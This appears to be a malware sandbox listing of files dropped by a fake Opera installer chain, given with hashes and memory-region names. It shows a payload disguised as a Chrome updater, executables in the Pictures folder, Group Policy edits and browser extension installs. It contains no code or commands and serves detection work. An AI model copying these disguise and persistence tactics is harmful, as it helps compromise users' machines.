SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252508714144.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe

MD5 b2d6071f0c13c212d6a0f7a9f0be0c3a
SHA1 ae6449fb551df26e629c47bf7b40bda9a7082daa
SHA256 be8d38d062dc8c047f32a300dd5b9c9bdc72834407de63c32ecac3cbb553fce2
SHA512 5f83692311b4efd458e9c5282ae29abc5408aa0228cf16080f176252a74544f30881e8468dab3b6d6f778ae3195f194c7e9429f8421ca292c78bb0fb6059c141

C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe

MD5 b2d6071f0c13c212d6a0f7a9f0be0c3a
SHA1 ae6449fb551df26e629c47bf7b40bda9a7082daa
SHA256 be8d38d062dc8c047f32a300dd5b9c9bdc72834407de63c32ecac3cbb553fce2
SHA512 5f83692311b4efd458e9c5282ae29abc5408aa0228cf16080f176252a74544f30881e8468dab3b6d6f778ae3195f194c7e9429f8421ca292c78bb0fb6059c141

memory/4144-213-0x0000000000DC0000-0x00000000012E9000-memory.dmp

memory/4992-216-0x0000000002930000-0x0000000002931000-memory.dmp

memory/1976-221-0x0000000004730000-0x0000000004740000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252537305048.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

MD5 6d3fc2f2abab017258985e5b32fb07ef
SHA1 1f686bfb1b6f83dc70a6c6af343053d186198222
SHA256 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0
SHA512 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923

C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe

MD5 6d3fc2f2abab017258985e5b32fb07ef
SHA1 1f686bfb1b6f83dc70a6c6af343053d186198222
SHA256 47eb746cecc1f58ff38d9b4e6c1647752418e5fa0abecd9bcb89ed7ad0e189d0
SHA512 4fd5e4dabca324c442a4f9566d69823cf71573001460901c912f42450ace209a35737e22e25e77611e728c2c59224aa2558b70ea50e6ae3cdf2c4246fdab1923

memory/5048-229-0x0000000000830000-0x0000000000D59000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2311212252552934936.dll

MD5 161c755621aa80426d48315d27bc8daa
SHA1 c17fed1e315395b38474842d3353663066b250c5
SHA256 6a17694a9428cb7ebcf1b7803e236ab76a557d4c041a5f7f229d6bab87b2c89b
SHA512 5dba00756f973ecddd0994c4af9779f26aec7f8f2b4f890532fba3cbb0a1e37fbc791bf8fbca047c4f3dbaa984ae78e2d4623686b83e6387741db959d36c22bf

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ca366089eb6c26e2b23804ee1ff6b327
SHA1 754abadca62ba893b7bf04145346608da3940041
SHA256 dcf939772ae07657a109c251a774223e19f17250a62a33f12fc372acb86654c7
SHA512 c2baf9ee3f317d4aae21e1eb34c0c3058f2eb00b9eb24ee4bf9ba1904d3d788a3dba84fa1c6b028ae98405275d760db6e59d42dadd624d800906521027384a86

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ca366089eb6c26e2b23804ee1ff6b327
SHA1 754abadca62ba893b7bf04145346608da3940041
SHA256 dcf939772ae07657a109c251a774223e19f17250a62a33f12fc372acb86654c7
SHA512 c2baf9ee3f317d4aae21e1eb34c0c3058f2eb00b9eb24ee4bf9ba1904d3d788a3dba84fa1c6b028ae98405275d760db6e59d42dadd624d800906521027384a86

memory/3160-240-0x00007FFCE15D0000-0x00007FFCE1899000-memory.dmp

memory/3160-241-0x00007FFCE15D0000-0x00007FFCE1899000-memory.dmp

memory/3160-239-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

memory/1976-243-0x0000000006C00000-0x0000000006C32000-memory.dmp

memory/1976-247-0x000000006F370000-0x000000006F3BC000-memory.dmp

memory/3160-246-0x00007FFC80030000-0x00007FFC80031000-memory.dmp

memory/3160-245-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/1976-258-0x00000000060D0000-0x00000000060EE000-memory.dmp

memory/4936-248-0x0000000000830000-0x0000000000D59000-memory.dmp

memory/4444-260-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/3808-262-0x0000000010000000-0x0000000010586000-memory.dmp

memory/3160-259-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/1976-261-0x0000000006E40000-0x0000000006EE3000-memory.dmp

memory/1976-263-0x0000000074A30000-0x00000000751E0000-memory.dmp

memory/3160-266-0x00007FFC80000000-0x00007FFC80002000-memory.dmp

memory/3160-264-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/1976-268-0x000000007EE10000-0x000000007EE20000-memory.dmp

memory/3160-270-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/3808-271-0x0000000000520000-0x0000000000C10000-memory.dmp

memory/4992-274-0x0000000000400000-0x0000000000965000-memory.dmp

memory/1976-276-0x00000000075B0000-0x0000000007C2A000-memory.dmp

memory/1976-277-0x0000000006F80000-0x0000000006F9A000-memory.dmp

memory/3160-273-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/3160-278-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/3160-282-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/3160-286-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

memory/4036-288-0x0000000002980000-0x0000000002D81000-memory.dmp

memory/1976-290-0x0000000007000000-0x000000000700A000-memory.dmp

memory/4036-291-0x0000000002D90000-0x000000000367B000-memory.dmp

memory/4036-299-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/1976-303-0x0000000004730000-0x0000000004740000-memory.dmp

memory/1976-304-0x0000000004730000-0x0000000004740000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/3160-305-0x00007FFCE3990000-0x00007FFCE3B85000-memory.dmp

memory/1976-308-0x0000000007200000-0x0000000007296000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

memory/1464-315-0x000001A9F5AD0000-0x000001A9F5AF2000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 ebd8f90406c4820902162e3156b1ecb4
SHA1 f909f010552a1471b7a2417d3a954d92dcf44833
SHA256 414b2bf1e0c76689465539ace0fce226ce6ef8619db64799b2b5c60f78b3cb4b
SHA512 7bfe96a23a31e9d089dbf8e945c9f562aed86377bf22da17f0fd6760d99edb4c85b8cbe5d3eedb31619da90f78382738141b4615a1d6519c0085c6ea5396eb98

memory/1464-335-0x000001A9F5B80000-0x000001A9F5B9C000-memory.dmp

memory/1464-336-0x000001A9F8290000-0x000001A9F8345000-memory.dmp

C:\Windows\system32\GroupPolicy\gpt.ini

MD5 a62ce44a33f1c05fc2d340ea0ca118a4
SHA1 1f03eb4716015528f3de7f7674532c1345b2717d
SHA256 9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA512 9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

memory/4036-342-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4776-347-0x00007FF7A4860000-0x00007FF7A4E01000-memory.dmp

memory/3160-348-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\opera_package

MD5 be5e4506abd821bcf03061f2fda2f0f6
SHA1 6f9683dbe26bede970c29badb3e678514864361f
SHA256 e1583c2dfbe506b9d041b9d6f605ce831d0757b7e2c1c3dc22271ae78b7d78dd
SHA512 182f847a3336baa0ac2f1489f79aba4c5ee8df43ba50581c2a8a27d5ad39a3b413714f5fa7d95923e73e95542cc40550e96dd98e04d1c63619760f181d36932e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 c9e91256d66895b139d1cccf4d06e815
SHA1 8329961df365d7efbeaf0ae7420edd971f824ed7
SHA256 84f0b933f3c63a466becbc6c48f100ef853639c063be4bbefa799b99f8299caf
SHA512 b0592e21828c80bac473e2111b4415f10cb776c572e90a4b0ecf0449b109bff23e6e5577593e908d3b756744848efd638804dbafe887dc589bc1890c93ede017

memory/4036-399-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4992-400-0x0000000000400000-0x0000000000965000-memory.dmp

memory/4776-401-0x00007FF7A4860000-0x00007FF7A4E01000-memory.dmp

memory/3160-402-0x00007FF63C3F0000-0x00007FF63D1EC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\additional_file0.tmp

MD5 b0f128c3579e6921cfff620179fb9864
SHA1 60e19c987a96182206994ffd509d2849fdb427e3
SHA256 1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA512 17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

MD5 b0f128c3579e6921cfff620179fb9864
SHA1 60e19c987a96182206994ffd509d2849fdb427e3
SHA256 1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA512 17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe

MD5 b0f128c3579e6921cfff620179fb9864
SHA1 60e19c987a96182206994ffd509d2849fdb427e3
SHA256 1c3ddbdd3a8cc2e66a5f4c4db388dff028cd437d42f8982ddf7695cf38a1a9ee
SHA512 17977d85cbdbd4217098850d7eaff0a51e34d641648ec29e843fc299668d8127e367622c82b2a9ceab364099da8c707c8b4aa039e747102d7c950447a5d29212

memory/4036-424-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2340781530aeec4608eb2e8a23a7db7e
SHA1 25d8755ac1b0d44edc78c7298c461bc5d6a943ef
SHA256 254d07a11e42b083cea30a4edc5b72cbd23f3facaed39df065d85245768bcafd
SHA512 3f85eac9207a45ad32245a62e826478c8fdb236d868f4ae46e1c9f2821bd0562f568be95d1270985efa6847d525fdc65461f47606ebf04a63b166c6756735263

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 124edf3ad57549a6e475f3bc4e6cfe51
SHA1 80f5187eeebb4a304e9caa0ce66fcd78c113d634
SHA256 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
SHA512 b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbgcore.DLL

MD5 5a6cd2117967ec78e7195b6ee10fc4da
SHA1 72d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256 a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA512 07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbgcore.dll

MD5 5a6cd2117967ec78e7195b6ee10fc4da
SHA1 72d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256 a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA512 07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbghelp.dll

MD5 861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1 a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA256 7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512 062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbghelp.dll

MD5 861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1 a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA256 7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512 062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe

MD5 34afbc4605531efdbe6f6ce57f567c0a
SHA1 6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b
SHA256 0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019
SHA512 577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbgcore.dll

MD5 5a6cd2117967ec78e7195b6ee10fc4da
SHA1 72d929eeb50dd58861a1d4cf13902c0b89fadc34
SHA256 a013652c95eca80356040312390d09ed78458fca6a0aef5ce3203dfe9cbc5040
SHA512 07aa64e6c681360c6c6c504041bd97f54dbf0aad8e498281dc8f8bdec2de4fc1c1bed9d0c4d3b6f4a4be19c408f7d34ff1c4a13db36488f698e3ae11855b895c

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\dbghelp.dll

MD5 861a07bcf2a5cb0dda1aaf6dfcb57b26
SHA1 a0bdbbc398583a7cfdd88624c9ac2da1764e0826
SHA256 7878be3359a3ecfcf94f961bcdce3e6e8bc01a55eba640d45b867b94f30fcdbc
SHA512 062159168817968f1165cb06299217a556c4e6b00ef7c740f845fdcbbaca77da346ef5fd7403c6f9d81e173a2fcf40c63da57cb884158f8c037c0df0ce1cc5b9

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202311212252531\assistant\assistant_installer.exe

MD5 34afbc4605531efdbe6f6ce57f567c0a
SHA1 6cb65f3565e40e7d08f5a0ad37b1b9182b4fc81b
SHA256 0441668bc7daf97c16734a8a95eb29de9fd2f4bec368f4d009e5437862249019
SHA512 577fe412d9b20055cf2f67e029a6829301d6b010cc03d2cf8ce89b87c213530dc4d396a27b92f56ed8260afd59d6fbd8cf841e807460f0a0bad4ad1df5b7c25c

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 ca366089eb6c26e2b23804ee1ff6b327
SHA1 754abadca62ba893b7bf04145346608da3940041
SHA256 dcf939772ae07657a109c251a774223e19f17250a62a33f12fc372acb86654c7
SHA512 c2baf9ee3f317d4aae21e1eb34c0c3058f2eb00b9eb24ee4bf9ba1904d3d788a3dba84fa1c6b028ae98405275d760db6e59d42dadd624d800906521027384a86

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fa0a0b2060165963bc78ad831029ad8a
SHA1 49051991104d7aff64f42778d9f4b8ed4410bc35
SHA256 c75e906296544b6c825a45ce616b7ce1137622540d996bfe24838c53fb2f4097
SHA512 d77c78efec2ce98014e1153829a4905ca58f50623301e2e51176fff9645d75e91ae7f2d2bb121180dd0da3d636e9fafef140de035f515308aee6e61268ed0b28

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 ce8d2d5a0aae0d4de7508f90bd5a4102
SHA1 d63d0dee43498221dccb9b2f415bde5fef5ac581
SHA256 8dbd3922fd6b77da7cb67936f6f1c6bd7a877c1f5be984d12f7f9020ebda360f
SHA512 b3a02f7b7dc56cba6b17eebca6183a1b5ecea3c8574256d959c8ac82c9751d9452ec5e9fb89849abdbf896800bb76ce529994caa3118c72dde3a3154bf1a0dd9

C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe

MD5 d373ff7cb6ac28b844d9c90fc8f1ab3f
SHA1 8bd2bd07e929d71f5c27ba7fab3777f29a4c48e3
SHA256 92a53acf35b82eaf96286b8a5dab6cef0513c48dff9e480fa3486033258c093b
SHA512 f89fce3365f1a9091b2523ea310089c53d67469e1d75b1e842eff2d59eb2a42fbbb49f03f3a45f9e56734895add9ac865e9adc1dbc0dfc4b34314b48bb0871a1

C:\Program Files\Google\Chrome\updater.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

MD5 7fa6b58a405f45136e713376181635a9
SHA1 de2ae0e895397208f73b69c8df27db80c4f2ee6e
SHA256 a90e472c958489debe0541426b5178f0953675c4ac595642b90256bdb2c51a25
SHA512 0a85b879179ed4500e9b57882bf7bb30a4c86d127c9e1cc4782704fc5cde7410a5084751c15bb68cd0b4ab677f51495036dfa77eca3d451513b73f93a2390bbb

C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe

MD5 14a535954bf4becdfd4dc6ad7cb45153
SHA1 d9eb9619e56cf54334e4cb28490113b6a5984c79
SHA256 32e227b8c3da4ffbf6a8d5565c2d7695e16096fd24810f4d065aaa58906664ff
SHA512 6c023d083708947a97c56bf2331f0f4dfebe544d452d1e16b73c6059a3b5ab1b69b4d21478d6851b520c1216213c1de6c51a83f50670cfb86f3e30573ba343b1

C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe

MD5 3029e2e226e0e0310a14943d2e8f0f8a
SHA1 2ed83097fe1ea84d5ff91a924d6b8a7df2a111d6
SHA256 c4a263f9b0d851926cdf4042017610fcfccb721b66967f2999ddfa33f89d9253
SHA512 6a0d62e194dfb8b80f883c68495c95a95064cf43e4d77cae7569e3fa51b808fbb297aac6d3398dfac8a70416eaf2acee4b0abcdcc25fba183bf693a299ed741a

C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe

MD5 24a387fda6e0f36f9af44d65487c5f5b
SHA1 a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970
SHA256 b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb
SHA512 f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 9a6b024d3b4d243d2741730c81bc843e
SHA1 d9b64b431437131a70e8b7bbbbf94b83d3c74314
SHA256 1c9edece92d3513f6ba272069765dacabab2aba9a19d5b312c73085e3f9062b1
SHA512 d8939a7f4c437f911bd51dc02d74921dabb2580df38c7c24bdc78a5921d3495f212091ea2a560220962ad060cc9efc0769f6761690ef87b76b89ea46bf6dc1dd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f3zxqty5.default-release\prefs.js

MD5 289041bd2bf3dfa0f571b4a1e6acd9eb
SHA1 7d4798b48736a9bc873dd717e30ddad4202d8c76
SHA256 79bcce695a523947a15fc4085ca51edf27362d9bea0e8497669006861f26a497
SHA512 f5ece4ad3be8e4808dd5d1eb7a7c7c231210c6c650b13eae089c13c60656d597ac55ae1e59e7f3eb1d4c9c9e386a13523ea7e18c84e41d5e63f6d1240b04a531

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e680136e702be379c73348c851ebb834
SHA1 92339bece2efdb9221bbcaf09c95eaf44ff1bb64
SHA256 e81a33a23efe42ceb58b235637793fac337b81f95d0a227a2383db723fbc35f0
SHA512 0dfc0a0c7558d1658bf1e93fff73ad60a12bcf784bb0c61bdf3fbfe8b9058a13c2f7bf731e79dc418769aeb7c3120f7aa36bcb1fba51e830fe58873aa64cfac8

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 2867ab694466069f0de0e9472abb5228
SHA1 d6ac826ec53b8e5addc33b52d7234c6d0a9d257f
SHA256 9f7683df71641216e9b453f77b257a7a8a45a7a398f3f61d67c7c85acc4607b5
SHA512 14c99f6422299d6865bebc9f0815aa563532c2394501c54c1df60924b53fd2cf546b6201e2f52e209c286c34818f7eddfa7bccbab6bb5e0ba64ade1e9b5a7bad